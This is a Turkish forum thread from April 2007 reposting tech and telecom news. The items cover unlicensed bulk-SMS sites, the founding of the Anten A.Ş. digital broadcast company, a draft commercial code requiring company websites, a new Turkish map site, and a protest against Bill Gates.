TK, yürüttüğü işlemde bir site kapatmamış olup 406 sayılı Telgraf ve Telefon Kanunun 2(f) ve 18’nci maddesi hükümlerinin uygulanmasına yönelik olarak yetkisiz SMS hizmeti sunan kuruluşların internet sitelerine erişimin engellenmesi amacıyla İSS işletmecilerine bildirim yapmıştır. Ayrıca, yasal olmayan söz konusu faaliyetlerin durdurulması için ilgili valiliklere bildirimde bulunulmuştur.

turk.internet.com : Listede Doğan Telekom'a ait bir site de bulunuyor. Ama bu firmaya tebliğ yapılmamış. Bu telekom lisansına sahip bir firma değil mi?

Telekomünikasyon Kurumu :
Doğan Telekomünikasyon Hiz. Satış ve Paz. A.Ş.’nin Uzak Mesafe Telefon Hizmetleri yetkilendirmesi, Doğan İletişim Elektronik Servis Hiz. ve Yayıncılık A.Ş.’nin Karasal Hatlar Üzerinden Veri İletimi Hizmetleri yetkilendirmesi ve Doğan İletişim Elektronik Servis Hizmetleri ve Yayıncılık A.Ş.’nin İnternet Servis Sağlayıcılığı yetkilendirmeleri bulunmakla birlikte internet üzerinden toplu SMS satışı yaptığı tespit edilen ancak yukarıda ticaret unvanları belirtilen şirketlerden farklı tüzel kişiliğe sahip olan Doğan İletişim Telekomünikasyon Elektronik Servis Hizmetleri Turizm ve Yayıncılık A.Ş. ve Medyanet İletişim Reklam Pazarlama ve Turizm A.Ş.’nin toplu SMS satışı dahil Kurumumuzca düzenlenmiş herhangi bir telekomünikasyon hizmeti sunumuna imkan sağlayan bir yetki belgesi bulunmamaktadır.


Anten A.Ş. Kuruldu
18 televizyon kanalının ortak anten sistemini oluşturacak olan Anten A.Ş. en sonunda kuruldu. Şirketin kuruluşuna ilişkin protokol bugün imzalandı. Törene, Devlet Bakanı ve Haberleşme Yüksek Kurulu Başkanı Beşir Atalay, Ulaştırma Bakanı Binali Yıldırım, RTÜK Başkanı Zahid Akman, TRT Genel Müdür Vekili Ali Güney, Televizyon Yayıncıları Derneği Başkanı Nuri Çolakoğlu ile ilgili televizyonların temsilcileri katıldı. Anten A.Ş.'nin 18 ortağı arasında TRT de bulunuyor.

Toplantıda konuşan Devlet Bakanı Beşir Atalay bütün televizyon yayınlarının tek kuleden yapılacağını ve bu kulelerin bulundukları şehirlerin sembolü haline geleceğini söyledi. Atalay, ilk etapta 13 şehirde paralel yayınların yani digital ve analog yayınların birlikte yapılacağını söyledi. Paralel yayınlar evlerde yeterli sayıda digital TV cihaz sayısına ulaşılması sonrası sadece digital yayın haline dönüşecek.

Paralel yayının ne kadar süreceği, Anten A.Ş.'nin kendi ölçümleriyle belirlenecek. Daha sonra sadece sayısal yayın devam edecek.

Öte yandan basın toplantısına gelen Haber-Sen Ankara Şube Başkanı Osman Köse, Anten A.Ş.’nin kuruluşunun yasaya aykırı olduğunu iddia etti ve gösteri yaptı.

RTÜK Başkanı Zahid Akman da Anten A.Ş’nin kuruluşunun karasal sayısal yayıncılığa geçişte dev bir adım olduğunu söyledi. TRT Genel Müdür Vekili Ali Güney de Anten A.Ş’nin vericilerin tek antende toplanması sayesinde, şehirlerdeki görüntü kirliliğinin önüne geçileceğine söyledi.
Son düzenleyen vain; 19 Nisan 2007 14:31 Sebep: Mesajlar Otomatik Olarak Birleştirildi
vain - avatarı
vain
Ziyaretçi
20 Nisan 2007       Mesaj #229
vain - avatarı
Ziyaretçi
Web Sitesini Zorunlu Kılan Ticaret Kanunu Geliyor
1535 maddelik Türk Ticaret Kanunu Tasarısı TBMM Adalet Komisyonu'nda kabul edildi. Türk ticaret yapısını yeniden düzenleyen tasarının önemli değişikliklerinden birisi, daha önce haberlerini yaptığımız çeşitli online ticari faaliyetleri tanımlaması oldu.

Tasarıya göre, her sermaya şirketine bir web sitesi bulundurma zorunluluğu getirilirken, şirketlerle ilgili belgelere internet sitesi adresi ile numarasının da yazılması zorunlu oluyor.

Şirketlerin web sitesinde, şirket ilanları, pay sahipleri ve ortakları açısından önem taşıyan açıklamalar, finansal tablolar, raporlar, yönetim kurulu ve genel kurul toplantılarına ilişkin bilgiler yayınlanacak. Şirketler, elektronik ortamda yönetim kurulu ve genel kurul toplantılarını yapabilecek.

Türkiye çapında şirket sicil kayıtlarına elektronik ortamda ulaşabilmenin sağlanması amacıyla kayıtların elektronik ortamda sunulabileceği bir bilgi bankası, TOBB tarafından kurulacak. Bilgi bankasına giriş serbest olacak. Ticaret sicilinin tutulmasından doğan bütün zararlardan, devlet ve ilgili oda, müteselsilen sorumlu olacak.
vain - avatarı
vain
Ziyaretçi
21 Nisan 2007       Mesaj #230
vain - avatarı
Ziyaretçi
Yeni Bir Harita Sitesi
Bilgiye benzersiz ve rakipsiz erişim alternatifleri sunan internetin gözde konu başlıklarından biri de haritalar. Google ve Microsoft başta olmak üzere birçok hizmet sağlayıcı web sitelerine eklediği uydu destekli haritalarla dünyanın neredeyse her köşesini birkaç tıklama uzağımıza kadar taşıdı. Ancak ABD dışındaki hemen hiçbir ülkede bu haritalar yerel bilgilerle donanmış değil.

İki Nokta ve Orsa adlı iki Türk bilişim şirketinin ortaklığıyla geliştirilen www.haritasitesi.com bu boşluğu doldurmayı başarıyor. Türkiye'yi sokak sokak, şehirden köylere kadar kapsayan hizmet benzer hizmetlerle hemen hemen aynı arayüze sahip. Dilediğiniz yeri sokak ismi girerek 'Haritada Bul' başlığı altında arayabildiğiniz gibi 'Nokta Bul' başlığında Türkiye genelinde ya da odaklandığınız noktadaki belediye binası, itfaiye amirliği, vergi dairesi, hastane, pastane gibi özel ilgi alanlarını da bulabiliyorsunuz.

Bill Gates'e Açık Protesto
Bill Gates, Pekin Üniversitesi'nde "Çin'in yazılım dünyasındaki geleceği" konusunda konuşma yaparken "Özgür Yazılım / Açık Kaynak" yazılı pankartla sahneye çıkan biri tarafından protesto edildi.

Detaylı bilgi ve fotoğraflara buradan ve şuradan erişebilirsiniz...
Son düzenleyen vain; 21 Nisan 2007 19:22 Sebep: Mesajlar Otomatik Olarak Birleştirildi

Benzer Konular

4 Aralık 2016 / gokhan404 Akademik
15 Mayıs 2019 / c0lin Oyunlar
1 Ekim 2013 / Ziyaretçi Soru-Cevap